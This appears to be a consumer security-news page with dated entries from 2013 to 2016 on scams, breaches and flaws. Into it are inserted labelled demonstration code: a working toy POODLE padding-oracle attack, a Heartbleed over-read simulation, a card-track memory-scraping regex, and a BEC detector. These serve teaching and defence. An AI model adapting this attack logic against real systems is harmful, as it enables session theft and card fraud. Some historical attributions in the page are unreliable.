
“Get a Personal Trainer for Your Computer!”©



2016

  Technology is always a double-edged sword.  Take cars.  Recent cars are full of new computers and chips: the ones that control navigation, offer emergency assistance (a/k/a “telematics”), check tire pressure, park automatically, monitor emissions, run diagnostics on the anti-lock brakes and fuel injection, run the radio, permit keyless entry and let cell phones connect.  The same connectivity lets an attacker get into those systems, usually through Bluetooth, the cellular link or another entry point, and from there potentially reach the computers that actually control the car.  This could become a problem.  Encryption and keeping the entertainment network separate from the control network may help, but defense is always a moving target.  2015 UPDATE:  See the IoT definition...

  If you are concerned about malware being transmitted to your home or business computer via USB drive, you can lock down your USB ports using USB Security Suite from Dynamikode, which is easy to use and works with all Windows operating systems, including Win 8.  (Turning off AutoRun and keeping Windows patched closes the most common USB infection route at no cost.)

  It was only a matter of time:  ransomware has come to your smartphone.  Malware called Android.Fakedefender pretends to be antivirus software while locking up your phone until you pay the “registration fee”.  Sound familiar?

STILL #1 - BEWARE FAKE ANTIVIRUS SOFTWARE!  Studies by Google beginning in 2010 found some 11,000 domains hosting fake anti-virus software, accounting for about half of all malware delivered via internet advertising.  It's very tricky, because its developers have made it so that you cannot go to any website that would provide help in removing it.  For example, while you might be able to go to eBay or Yahoo, you cannot go to Symantec or bleepingcomputer.com, start in Safe Mode, or run the .exe files of anti-virus or anti-malware programs.  SEE THE EXAMPLES BELOW:

[Screenshots: a fake anti-virus alert; a “2014 virus trends” pop-up; a fake Microsoft message; “Windows Performance Advisor”.]

4/1/16:  There isn't much you can do about this, but be aware of the most recent spate of cyberattacks:  MedStar Georgetown University Hospital, Hollywood Presbyterian Medical Center in L.A., Kentucky-based Methodist Hospital and two southern California hospitals of Prime Healthcare were all hit with ransomware demands in March, 2016.  Hospitals aren't the only targets, but because they have only recently moved to electronic medical records, they are behind the security curve and therefore more vulnerable.

6/15/16:  The FBI's “IC3” (see Associations) announced that the scourge it calls “BEC” [Business E-mail Compromise] has now racked up over $3 billion in losses.  The scam is typically carried out by compromising or impersonating legitimate business e-mail accounts (often those of executives, bookkeeping or auditing staff) through social engineering or intrusion, then using them to request unauthorized transfers of funds.  The single best defense is procedural: confirm any change of payment instructions, or any unusual wire request, by phone at a number you already have, not one given in the e-mail.
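The tell-tale signs of a BEC message described above (an executive's display name on an outside address, a lookalike sender domain, a Reply-To that goes somewhere else, payment and urgency wording) can be checked mechanically.  The following triage script is an added example, not code from the original page or from IC3; “example.com”, the executive directory and the two sample messages are all constructed for the demo.

```python
"""
Added example, not from the original page: a small triage check for the
tell-tale signs of a BEC message (executive display name on an outside
address, lookalike sender domain, Reply-To pointing elsewhere, payment and
urgency wording).  "example.com", the executive directory and the two
messages below are all constructed for the demo.
"""
import email
import email.utils
from email import policy

COMPANY_DOMAIN = "example.com"                        # assumed: the victim company's real domain
EXECUTIVES = {"jane doe": "jane.doe@example.com"}     # assumed: display name -> real address
WIRE_WORDS = ("wire", "transfer", "invoice", "payment", "urgent", "confidential")


def edit_distance(a, b):
    """Levenshtein distance; used to spot examp1e.com, exampel.com, example.co ..."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(addr):
    return addr.rsplit("@", 1)[-1].lower()


def bec_indicators(raw_message):
    """Return a list of human-readable red flags found in one RFC 822 message."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    name, addr = email.utils.parseaddr(msg.get("From", ""))
    _, reply_addr = email.utils.parseaddr(msg.get("Reply-To", ""))
    from_dom = domain_of(addr)
    flags = []
    known = EXECUTIVES.get(name.strip().lower())
    if known and addr.lower() != known:
        flags.append(f"display name '{name}' is a known executive but address is {addr}")
    if from_dom != COMPANY_DOMAIN and 0 < edit_distance(from_dom, COMPANY_DOMAIN) <= 2:
        flags.append(f"sender domain {from_dom} is a lookalike of {COMPANY_DOMAIN}")
    if reply_addr and domain_of(reply_addr) != from_dom:
        flags.append(f"Reply-To goes to {domain_of(reply_addr)}, not the sender's domain")
    body = msg.get_body(preferencelist=("plain",))
    text = (body.get_content() if body else "").lower()
    hits = [w for w in WIRE_WORDS if w in text]
    if len(hits) >= 2:
        flags.append("payment/urgency language: " + ", ".join(hits))
    return flags


SAMPLE_BEC = """\
From: Jane Doe <jane.doe@examp1e.com>
Reply-To: jane.doe@mail-examp1e.net
To: accounts@example.com
Subject: Quick favor

I'm in a meeting all day. Need you to process a confidential wire payment
to a new vendor today; I'll send the invoice details next.
"""

SAMPLE_OK = """\
From: Jane Doe <jane.doe@example.com>
To: accounts@example.com
Subject: Lunch

Anyone up for Thai on Friday?
"""

if __name__ == "__main__":
    for label, raw in (("suspicious", SAMPLE_BEC), ("benign", SAMPLE_OK)):
        print(label, "->", bec_indicators(raw) or "no indicators")
```

Note the limit: when the executive's real mailbox has been taken over, the sender address and domain are genuine and only the Reply-To and wording checks have any chance, which is why the out-of-band phone confirmation above is the control that actually matters.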

2015

12/31/15:  By now almost everyone is protected from bulk spam and spam from known purveyors, so spammers have changed tactics to what researchers call “snowshoe” or “artisanal” spam: e-mails sent in small batches from many small, unknown ISPs and servers that lack the resources of the big providers to ferret out abuse (spreading the load so no single source looks bad, the way a snowshoe spreads weight), and more carefully crafted for the recipients.  They look much more authentic and therefore get past users' filters and into the inbox.  Mail looks like it's from Apple, for example, but it isn't.

10/1/15:  The “Secret Sister” hoax started popping up on Facebook this month, promising a wealth of gifts to anyone who passes along a Facebook post or e-mail as instructed.  In reality it's a chain letter and a pyramid scheme: illegal and mathematically impossible to pay out, so don't do it.

10/1/15:  As soon as the Win10 upgrade came out, so did the cryptoware scams from the Russians.  Click HERE for more....

7/29/15:  Stagefright attacks Android phones via text or MMS with a crafted media file that exploits a weakness in Android's multimedia library (libstagefright).  The file is processed when the phone previews or opens it, and because many phones fetch MMS messages automatically, the victim may not have to do anything at all.

7/9/15:  If you haven't been reading the news lately, the U.S. government announced that the Office of Personnel Management (the agency that vets and keeps records on federal employees) was hacked to the tune of some 20 million names and their associated personal data, including the detailed background-check forms.  If you underwent a federal background check in 2000 or later, expect that someone, probably the Chinese, has your information.  Check with OPM, which says it is offering a “comprehensive suite of monitoring and protection services to those impacted”.

7/10/15:  We all know that most security software today operates much like a fire alarm system: it sounds when there's smoke or fire, and then someone calls the fire department to fix a problem that's already there.  Something has to change.  DARPA has created a competition (the Cyber Grand Challenge) to develop a new generation of software that will find the cracks in programs and systems and patch them before they are hacked.  This could take years and might never be fully realized, but it's a start.

1/31/15:  While there are legitimate products named SafeSearch, the malware of that name isn't one of them.  This browser hijacker generally comes bundled with free downloads when you're not looking.  And it's very hard to get rid of, even if you know what you're doing.  You think it's removed and then, poof!, it shows up a little later.  It takes a lot of steps and the right timing to get this one off, at least for now.

2014

  12/18/14 - Microsoft filed a lawsuit against an alleged tech support company based in L.A., Consumer Focus Services, which operates under such names as Omni Tech Support, FixNow and Techsupport Pro and has been perpetrating technical support scams on Microsoft customers.  This is in addition to the lawsuits filed last year by the FTC (and other international organizations) against 14 corporate and 17 individual telephone scareware scammers (mostly based in India) that claim to be “representatives” of Microsoft, Dell or the like, telling you that there's something wrong with your computer and asking permission to check it, then loading malware that infects your computer and charging you for its removal.  Many of these cases have settled, or maybe the scammers are just moving to other countries like Russia, where they may enjoy safe haven.  The fines paid, though, are dwarfed by the $1.5 billion in damages Microsoft claims were lost last year alone.  While this might at least slow down these types of attacks, we're still receiving quite a few calls each month about this, and several clients have fallen for the ruse, infecting their computers.  Click HERE for the Microsoft blog and video about this scam.  So be vigilant - if you receive a call from “Microsoft” (which never calls anyone), just hang up.

12/31/14:  Click HERE for a discussion of password and intrusion vulnerabilities and how to protect yourself from them.

11/23/14:  Symantec reports a piece of spyware named Regin that has been used for six years to capture screenshots, steal passwords and recover deleted files.  Based on its complexity, Symantec says it was probably created by a nation state for cyber espionage.  It has been found on computers in Russia, Saudi Arabia and Ireland, among other countries, and covers its tracks after doing its work.  Unlike Stuxnet, which was designed to damage equipment, Regin's purpose is to collect information.

11/10/14:  Thousands of Apple iOS devices were hit with the Wirelurker malware, delivered through a Chinese third-party app provider that was delivering pirated programs.  It installed itself as a system component which grabbed private data such as device serial numbers, iTunes info, phone numbers, etc. for malicious purposes.  Shortly after its discovery, Apple revoked security certificates and blocked the apps from launching.  Click HERE for software to detect if you have Wirelurker.  Wirelurker was noteworthy because it is only the second time in Apple history that malware has targeted iOS devices via USB and the first that has created malicious apps or infected existing iOS ones.

10/16/14:  Today's security vulnerability is POODLE, which stands for Padding Oracle On Downgraded Legacy Encryption.  It's a flaw in SSL 3.0, the older web encryption protocol, which should be disabled in your browser and on your Windows system (see browser settings), although a few old business sites may stop working.  SSL has been mostly superseded by TLS on modern computers.  Exploiting POODLE requires an attacker sitting on the network path between you and the website (a public Wi-Fi hotspot, for example) with an active connection to work with.  From there the attacker forces the browser to downgrade its TLS connection to SSL 3.0, and then abuses the way SSL 3.0 checks CBC padding to decrypt the session, one byte per roughly 256 requests, which is enough to recover session cookies and possibly other sensitive personal information.
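The SSL 3.0 padding weakness described above, worked through as an added example (not code from the original page and not real OpenSSL or browser code): a toy record layer that checks only the padding-length byte, as SSL 3.0 does; a “browser” that attaches a secret cookie to requests whose path and body lengths the attacker controls; and the attacker loop that recovers the cookie one byte at a time by copying the target ciphertext block over the padding block and watching whether the server accepts the record.  The Feistel block cipher, the fresh-IV-per-record simplification and the request layout are assumptions made for the demo; the `strict_padding` flag shows why the same trick fails against TLS 1.0-style padding checks.

```python
"""
Toy reproduction of the POODLE padding-oracle attack against SSL 3.0-style
CBC records.  Added example, not from the original page.  The block
cipher is a 4-round Feistel toy (assumption: NOT a real cipher, used only
so the script needs nothing beyond the standard library); the attack does
not depend on which block cipher sits underneath.  A fresh random IV per
record is also a simplification (SSL 3.0 chains IVs across records).
"""
import hashlib
import hmac
import random

BLOCK = 16
MAC_LEN = 20                      # SSL 3.0 with SHA-1: 20-byte MAC
rng = random.Random(7)            # deterministic run for the demo


def rand_bytes(n):
    return bytes(rng.getrandbits(8) for _ in range(n))


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _f(half, key, r):
    return hashlib.sha256(key + bytes([r]) + half).digest()[:8]


def enc_block(key, blk):
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, xor(l, _f(r, key, i))
    return l + r


def dec_block(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _f(l, key, i)), l
    return l + r


def cbc(key, iv, data, encrypt):
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        blk = data[i:i + BLOCK]
        if encrypt:
            prev = enc_block(key, xor(blk, prev))
            out.append(prev)
        else:
            out.append(xor(dec_block(key, blk), prev))
            prev = blk
    return b"".join(out)


class Ssl3Record:
    """MAC-then-pad-then-encrypt.  SSL 3.0 only checks the padding LENGTH byte;
    strict_padding=True adds the TLS 1.0 rule that every pad byte must equal it."""

    def __init__(self, strict_padding=False):
        self.enc_key, self.mac_key = rand_bytes(16), rand_bytes(20)
        self.strict = strict_padding

    def seal(self, plaintext):
        data = plaintext + hmac.new(self.mac_key, plaintext, hashlib.sha1).digest()
        pad_len = BLOCK - 1 - len(data) % BLOCK          # pad_len + 1 bytes of padding
        data += bytes([pad_len]) * (pad_len + 1)         # block-aligned input gets a full pad block
        iv = rand_bytes(BLOCK)
        return iv, cbc(self.enc_key, iv, data, True)

    def open(self, iv, ct):
        """True if the record decrypts to valid padding + MAC (all the attacker observes)."""
        data = cbc(self.enc_key, iv, ct, False)
        pad_len = data[-1]
        if pad_len >= BLOCK or pad_len + 1 + MAC_LEN > len(data):
            return False
        if self.strict and data[-pad_len - 1:-1] != bytes([pad_len]) * pad_len:
            return False
        body = data[:-pad_len - 1 - MAC_LEN]
        mac = data[-pad_len - 1 - MAC_LEN:-pad_len - 1]
        return hmac.compare_digest(mac, hmac.new(self.mac_key, body, hashlib.sha1).digest())


# Victim browser: attacker-controlled JavaScript chooses the path and body lengths,
# the browser attaches the secret cookie itself.
HEAD1, HEAD2, TAIL = b"POST /", b" HTTP/1.1\r\nCookie: sid=", b"\r\n\r\n"


def client_request(rec, prefix_len, cookie, body_len):
    return rec.seal(HEAD1 + b"a" * prefix_len + HEAD2 + cookie + TAIL + b"b" * body_len)


def recover_cookie(rec, cookie, cookie_len, max_tries=20000):
    """Attacker: knows the request layout and cookie length, not the cookie value."""
    head = len(HEAD1) + len(HEAD2)
    found, tries = bytearray(), 0
    for k in range(cookie_len):
        prefix_len = (BLOCK - 1 - (head + k) % BLOCK) % BLOCK   # cookie[k] becomes last byte of block i
        i = (head + prefix_len + k) // BLOCK
        fixed = head + prefix_len + cookie_len + len(TAIL) + MAC_LEN
        body_len = (-fixed) % BLOCK                              # plaintext+MAC block-aligned -> full pad block
        while True:
            tries += 1
            if tries > max_tries:
                return bytes(found), tries                       # gave up (happens with strict padding)
            iv, ct = client_request(rec, prefix_len, cookie, body_len)
            c = [iv] + [ct[j:j + BLOCK] for j in range(0, len(ct), BLOCK)]
            n = len(c) - 1
            tampered = b"".join(c[1:n] + [c[i + 1]])             # target block copied over the pad block
            if rec.open(iv, tampered):
                # accepted, so D(c[i+1])[-1] ^ c[n-1][-1] == BLOCK-1; solve for the plaintext byte
                found.append((BLOCK - 1) ^ c[n - 1][-1] ^ c[i][-1])
                break
    return bytes(found), tries


if __name__ == "__main__":
    cookie = b"S3cretCk"
    got, tries = recover_cookie(Ssl3Record(), cookie, len(cookie))
    print(f"SSL 3.0 padding: recovered {got!r} in {tries} requests (~256 per byte)")
    got, tries = recover_cookie(Ssl3Record(strict_padding=True), cookie, len(cookie), 5000)
    print(f"TLS-style padding check: recovered {got!r} after {tries} requests")
```

Run it and the 8-byte cookie comes back in roughly 2,000 forced requests, about 256 per byte; with `strict_padding=True` the loop gives up with nothing, which is why the fix for POODLE is to stop the downgrade (disable SSL 3.0, or use TLS_FALLBACK_SCSV) rather than to patch the padding code.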

 10/1/14:  It's been revealed that hackers infiltrated seven of the largest U.S. banks, using sophisticated malware to invade computer systems and manipulate records.  The worst hit, JPMorgan Chase, revealed that this summer cybercriminals gathered information on more than 80 million customers in a massive hack.  While the hackers didn't get account information (account numbers, social security numbers, birth dates or IDs), they can still sell the stolen names, e-mail addresses and other contact information to spammers and phishers.  Reports at the time tied the intrusion to Shellshock, a flaw in the Bash shell (see Linux for more) found on Linux, Unix and Apple OS X systems: Bash would run commands hidden in specially crafted environment variables, so any service that passes outside input into an environment variable before starting a shell (web servers running CGI scripts, DHCP clients on untrusted Wi-Fi networks, some SSH setups) could be made to run an attacker's commands.  This is primarily an enterprise problem, much less so for consumers, although it also affects routers, NAS boxes and other devices that run Linux with Bash and may never be patched.

 9/8/14:  Here we go again.  Home Depot reported possibly the largest debit and credit card hack yet, some 56 million cards.  It occurred between April, 2014 and 9/2/14, and Home Depot doesn't yet know its full extent, i.e. whether only Track 1 and 2 data (the customer's name, card number and expiration date) was taken or PINs as well.  The malware appears to be a variant of the one used in the Target attack, but it was possible only because of HD's lax security.

 

>>>>Other countries have it much worse.  You might not have heard of this, but 40% of the S. Korean population (about 20 million citizens) had their credit card and personal data stolen, copied by a contractor working at the Korea Credit Bureau.

 6/30/14:  Symantec has uncovered the compromise of more than 1,000 energy companies (grid operators and industrial equipment providers) in 84 countries, mainly in North America and Europe.  Since 2011, the Eastern European group known as Dragonfly has used Backdoor.Oldrea to gather system information and Trojan.Karagany to upload stolen data from organizations that use industrial control systems (“ICSs”) to manage electrical, water, oil, gas and data systems for energy utilities around the world.  The purpose, at this point, appears to be espionage.  Symantec believes the attacks have all the hallmarks of a state-sponsored operation, like the Stuxnet worm in 2010.  It doesn't, however, affect consumers directly.

 5/21/14:  The victim of a cyberattack, eBay asked its 145 million registered users to change their passwords, even though the stored passwords were encrypted (hashed).  Although PayPal is an eBay subsidiary, it runs on separate systems, so there's no need to change that password (unless, of course, you used the same one in both places).

 5/15/14:  The FBI arrested some 90 people after 300 international searches, shutting down the Blackshades remote-access tool (“creepware”) that was used, among many other things, to spy on Cassidy Wolf, Miss Teen USA, through her own webcam.

4/10/14:  You might have heard about the Heartbleed bug.  While it's a server issue and end users can't really do much to cure it, it is a pretty big deal, one of the worst Internet bugs ever.  And exploiting it leaves no trace in ordinary server logs.  If you use secure sites to get your e-mail, do your online banking or shopping, or access social media accounts that require sign-in credentials, you could be at risk: the bug lets an attacker read up to 64 KB of the server's memory per request, which can contain other users' passwords, session cookies and even the server's private key, and that material can be used later to pose as you.  The flaw is in OpenSSL, which is used in thousands of programs that speak SSL/TLS, including VPN appliances, cell phones, copy machines, websites offering secure “https://” connections and mail services such as POP3S and IMAPS.  Basically, if you are going through one of the roughly two-thirds of secure web servers that run OpenSSL (typically Apache or nginx on Linux or BSD; Microsoft's IIS is not affected), you may have a security problem.  The bug is named “Heartbleed” because it involves a routine OpenSSL feature known as the “heartbeat”, which lets one computer check that the other is still there by asking it to echo back a short message: the buggy code trusted the length the sender claimed for that message and copied that many bytes out of memory, whether or not they belonged to the message.  The vulnerable code shipped in OpenSSL 1.0.1 in March 2012, so it was exposed for about two years.  Most servers are currently being patched, but it will take a little time.  And, over all that time, your credentials may already have been stolen.  For more information, go to Heartbleed.com.  What can you do?  Other than change your passwords [but not until the server is patched and has a new certificate], very little.  [Click HERE for an updated CNN list of sites which do and do not require updated passwords.]  However, if a website recommends that you take any specific actions before using their site, listen to them or don't go there.
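The “trusted length” mistake described above, as an added example (not code from the original page and not OpenSSL's C source): a toy heartbeat handler in Python that mirrors the pre-1.0.1g logic beside the bounds check the fix added.  `MEMORY` is a constructed bytearray standing in for the server's heap, with the attacker's record at offset 0 followed by data from other sessions; the slice plays the role of C's memcpy, except that Python stops at the end of the buffer where C would keep reading.

```python
"""
Added example (not from the original page or OpenSSL): a toy TLS heartbeat
handler that reproduces the Heartbleed logic.  MEMORY is a constructed
bytearray standing in for the process heap; the request record sits at
offset 0 and is followed by other data the server happens to hold.
"""
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
PADDING = 16                      # RFC 6520: at least 16 bytes of padding


def build_heartbeat(payload, claimed_len=None):
    """Client side.  A well-behaved client sets claimed_len == len(payload)."""
    claimed = len(payload) if claimed_len is None else claimed_len
    return bytes([HB_REQUEST]) + struct.pack(">H", claimed) + payload + b"\x00" * PADDING


def _parse(memory, off):
    hbtype = memory[off]
    (payload_len,) = struct.unpack(">H", bytes(memory[off + 1:off + 3]))
    return hbtype, payload_len, off + 3          # off + 3 is the C pointer `pl`


def respond_vulnerable(memory, off, rec_len):
    """Pre-1.0.1g logic: trusts payload_len and never compares it with rec_len."""
    hbtype, payload_len, pl = _parse(memory, off)
    if hbtype != HB_REQUEST:
        return None
    # memcpy(bp, pl, payload): copies payload_len bytes from pl onward, even when
    # that runs far past the end of the record that was actually received.
    echoed = bytes(memory[pl:pl + payload_len])
    return bytes([HB_RESPONSE]) + struct.pack(">H", payload_len) + echoed + b"\x00" * PADDING


def respond_fixed(memory, off, rec_len):
    """Logic added in OpenSSL 1.0.1g: bound payload_len by the record length."""
    if rec_len < 1 + 2 + PADDING:
        return None                              # silently discard
    hbtype, payload_len, pl = _parse(memory, off)
    if hbtype != HB_REQUEST:
        return None
    if 1 + 2 + payload_len + PADDING > rec_len:
        return None                              # the one-line fix
    echoed = bytes(memory[pl:pl + payload_len])
    return bytes([HB_RESPONSE]) + struct.pack(">H", payload_len) + echoed + b"\x00" * PADDING


def leaked_payload(response):
    """Strip the type/length header and return what the server echoed back."""
    (n,) = struct.unpack(">H", response[1:3])
    return response[3:3 + n]


# Constructed "heap": the attacker's record, then data belonging to other sessions.
SECRETS = b"Cookie: sid=8f3a91c2deadbeef\r\n-----BEGIN RSA PRIVATE KEY-----\nMIIE..."
REQUEST = build_heartbeat(b"hi", claimed_len=120)   # 2 real payload bytes, claims 120
MEMORY = bytearray(REQUEST + SECRETS)

if __name__ == "__main__":
    bad = respond_vulnerable(MEMORY, 0, len(REQUEST))
    print("vulnerable server echoed:", leaked_payload(bad))
    print("fixed server response   :", respond_fixed(MEMORY, 0, len(REQUEST)))
```

A real attacker repeats the oversized request thousands of times; each answer is a different 64 KB window of whatever the server had in memory, which is how private keys were pulled out of patched-too-late servers.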

 2/25/14:  Apple has issued fixes for Macs, iPhones and iPod touches patching a security hole (the “goto fail” bug in its SSL/TLS code) discovered four days earlier which could have exposed users' sensitive information to hackers.  Left unfixed, an attacker on the same network could potentially read private communications sent from Apple devices, like e-mails, IMs, social media posts and maybe online banking transactions.  The OS X fix (10.9.2) is for Mavericks; Mountain Lion and older versions of the OS were not vulnerable.

 1/20/14:  Apparently, the NSA isn't the only party that can listen to you over your phone or computer.  Google's Chrome browser has had a bug since last September that lets a website you once allowed to use speech recognition keep the microphone on, in a hidden pop-under window, and listen in on your conversations hoping for private information.  The Israeli developer who reported it says the eavesdropping bug still hasn't been fixed.

 1/15/14:  The box at the top of this page discusses hacking your car and appliances.  And it's happened.  Proofpoint has uncovered what may be the first wide-scale attack that involved TVs and a refrigerator: a botnet created when hackers broke into more than 100,000 everyday devices (routers, but also media centers, TVs and other internet-connected appliances) between December 23, 2013 and January 6, 2014, then used them to send more than 750,000 malicious e-mails to enterprises and individuals worldwide.  Separately, Context Security released details of how it hacked the LIFX smart light bulb in 2014: by joining the bulbs' mesh network it could extract the owner's Wi-Fi network name and password (since fixed).  But how many more vulnerabilities are out there??  While the IoT may be taking off exponentially and providing lots of convenience, the down-side is that it has lots of vulnerabilities.

2013

12/1/2013:  Computer running slow?  It could be mining Bitcoins for someone else.  For years, I've been writing about Bitcoins, but things have really taken off this year.  Now, we have Bitcoin malware.  Malwarebytes and other anti-malware providers report that Mutual Public (a/k/a We Build Toolbars or YourFree Proxy) bundles a Bitcoin miner known as “jhProtominer”, running as a process called “monitor.exe”, which mines bitcoins without your knowledge.  Technically you agree to this in the fine print of the software download, but you probably missed it.  The software links your computer with thousands of others into a botnet that continuously mines bitcoins for the benefit of an undisclosed server and its owner.  This is similar to the SETI@home program that lets SETI use your computer and others to search for extraterrestrial life using a network of home computers, but in that case you have to opt in explicitly, so it's not malware.

  12/18/13:  The breach in which data was pilfered from millions of Target credit and debit cards this month has created much concern among customers and their banks.  At this point, how the breach occurred is speculation, although it appears that Target may not have encrypted all of its data and stored some of it in the clear, not a recommended practice.  UPDATE:  The malicious “memory scraping” software the hackers used parsed the data held briefly in the memory of specific POS devices, capturing the contents of the card's magnetic stripe in the instant after it was swiped, while it was still sitting in the system's memory before being encrypted for transmission.  It's believed that they got in through the accounts of some of the store's vendor connections.  Here's what is known:  The thieves, probably from Eastern Europe or Russia, got only the information on the magnetic stripe of credit, debit and Target REDcards.  That is, probably the customer's name (not sure for all cards), the account number, expiration date and the card-present CVV encoded on the stripe (not the same as the one printed on the back).  Not the account PIN, not the CVV on the back of the card.  See CVV for more about what these numbers mean.  [UPDATE:  Evidently they did get the (encrypted) PINs on debit cards.]  If you're concerned, cancel and reissue each card, or at least set up “account alerts” with the issuer so you'll immediately be notified of any unusual spending.  Personally, my advice is that if your debit card was caught up in this, change it immediately, because debit cards don't have the protection given credit cards and you could lose everything in your checking account.  UPDATE:  In February, Krebs on Security reported that the breach appears to have begun with a malware-laced phishing e-mail sent to employees of Fazio Mechanical, an HVAC firm that did business with the nationwide retailer.
The company's primary method of detecting malicious software on its internal systems, unfortunately, was the free version of Malwarebytes Anti-Malware, which only scans on demand and isn't licensed for corporate use anyway.  UPDATE:  On 4/25/14 Michaels Arts & Crafts disclosed a similar breach of almost 3 million payment cards.  UPDATE:  It just never stops:  In August, 2014, it was reported that Russian hackers had amassed 1.2 billion user names and passwords, stolen from over 420,000 websites of companies large and small.
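What a POS “memory scraper” like the one in the Target breach actually looks for is simple: the Track 1 and Track 2 formats from the magnetic stripe, sitting in process memory for a moment after the swipe, filtered with a mod-10 (Luhn) check to throw away false matches.  The following added example (not code from the original page and not the attackers' tool) turns that same pattern match around as a defensive scan over a memory dump.  The `MEMORY` buffer is constructed; 4111 1111 1111 1111 and 5500 0000 0000 0004 are published industry test numbers, not real accounts.

```python
"""
Added example, not from the original page: the pattern match a POS memory
scraper runs over process memory to pull magnetic-stripe data, turned around
as a defensive scan you can run over a memory dump.  MEMORY and the card
numbers are constructed test data (published industry test PANs).
"""
import re

# Track 1: %B<PAN>^<NAME>^<YYMM><service code><discretionary data, incl. CVV1>?
TRACK1 = re.compile(rb"%B(\d{13,19})\^([^^]{2,26})\^(\d{4})(\d{3})([^?]{0,40})\?")
# Track 2: ;<PAN>=<YYMM><service code><discretionary data>?
TRACK2 = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})([^?]{0,40})\?")


def luhn_ok(pan):
    """Mod-10 check; scrapers use it to discard digit runs that are not card numbers."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask(pan):
    """PCI-style display form: first six and last four digits only."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_memory(buf):
    """Return one record per Luhn-valid track found in buf, with PANs masked."""
    hits = []
    for m in TRACK1.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            hits.append({"track": 1, "offset": m.start(), "pan": mask(pan),
                         "name": m.group(2).decode().strip(), "exp": m.group(3).decode(),
                         "service": m.group(4).decode()})
    for m in TRACK2.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            hits.append({"track": 2, "offset": m.start(), "pan": mask(pan),
                         "exp": m.group(2).decode(), "service": m.group(3).decode()})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed stand-in for a POS process memory dump: junk, a track 1 record,
# more junk, a track 2 record, and a track-2 lookalike whose PAN fails Luhn.
MEMORY = (b"\x00\x17\x8a junk \xff"
          + b"%B4111111111111111^DOE/JOHN^25121010000000000123?"
          + b"\x00\x00 more junk \x7f"
          + b";5500000000000004=2512101123456789?"
          + b";4111111111111112=2512101000?")

if __name__ == "__main__":
    for h in scan_memory(MEMORY):
        print(h)
```

The discretionary field after the service code is where the stripe's own CVV (the card-present value, not the one printed on the back) lives, which is why stripe data alone is enough to clone a card.  The countermeasure is point-to-point encryption in the card reader itself, so the track data never appears in the terminal's memory in the clear for a scraper to find.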

 12/30/13:  Right on the heels of the Target data theft came the Snapchat theft.  The user names and telephone numbers (required for registration) of some 4.6 million Snapchat members were harvested and posted as a database on snapchatdb.info.  This may have been done to demonstrate the insecurity of the service and Snapchat's failure to fix a known vulnerability in its “find friends” feature; we're not sure.  Also reported: breaches at several other retailers, including Neiman Marcus and at least three others, one of which was breached in July but didn't notice it until December, 2013!

  11/13:  Apparently, you’re not even safe from your own government.  Snowden leaks (see Whistleblowers) revealed that the NSA hacked more than 50,000 U.S. computer networks last year alone under the category of CNE (“Computer Network Exploitation”), by infecting them with malware used to report back and conduct sophisticated spy operations.  For more, see LAWS, RANT.

  4/9/13 - Don't install Microsoft Win 7 update KB 2823324.  It can cause a BSOD after reboot, or at least recurring chkdsk prompts at startup, and seems to affect computers running Kaspersky Anti-Virus more than others.  Microsoft pulled the update at the end of the week.  It's the second time this year that a Windows update has caused major problems.  UPDATE:  Even the replacement patch is reported not to work very well.  Just skip or roll back this update.

  4/2/13 - One of the largest cyberattacks in history is targeting the Spamhaus Project, a European spam-fighting group, allegedly because it blacklisted Cyberbunker, a Dutch hosting company that will host any content except child porn or terrorism.  The attack is a DNS amplification DDoS reported at around 300 Gbps: the attackers send small DNS queries carrying Spamhaus's forged source address to thousands of open DNS resolvers, which answer with much larger replies aimed at the victim.  Because it was aimed not only at Spamhaus but at the Internet exchanges upstream of it, it caused delays across the Internet for everyone.

  3/13 - Beware of those unrequested password reset e-mails.  If one of your providers was hacked (as Evernote was, earlier this month), you may receive an e-mail telling you to reset your password.  But it's equally likely that you will receive a fake e-mail created to capture your new password.  As always, be sure to go to the provider's actual website and reset the password from there, not from a link in the e-mail.  It may be a phishing attack.

  3/13 - In early 2013, it was reported that Microsoft, Apple (yes, Apple) and Facebook were victims of hackers; the Eastern European gang behind it successfully targeted at least 40 companies.  In February, 2013, customer-support tool Zendesk reported that it was hacked, exposing the e-mail addresses of users of three of its clients: Tumblr, Pinterest and Twitter.  Shortly after, on March 4, 2013, Evernote, purveyor of note-taking software, announced that it had been hacked as well, exposing the e-mail addresses and user names of its fifty million users.  The passwords, being salted and hashed, were probably not at immediate risk.  There's not much you can do about these hacks except change your password, and watch out for any communications requesting verification of personal or billing information or passwords.  This is one of the downsides of cloud computing.

  2/13 - Beware of the Sality virus.  This true virus, which may not be tracked by your average anti-virus software, can be found and removed using a special tool from Kaspersky.

 1/9/13 - Security researchers and the U.S. Department of Homeland Security advised users to temporarily disable Java in their web browsers because of a security weakness that was already being exploited.  Oracle issued an emergency Java fix within days, with a broader patch set of 86 fixes due on January 15th.  UPDATE:  The patch is out, but many reviewers claim that it's still insufficient.  I'd recommend that, if you don't use Java, leave it disabled until this issue is fully resolved (and if you do need it, disable the browser plug-in and run only local Java applications).

2012

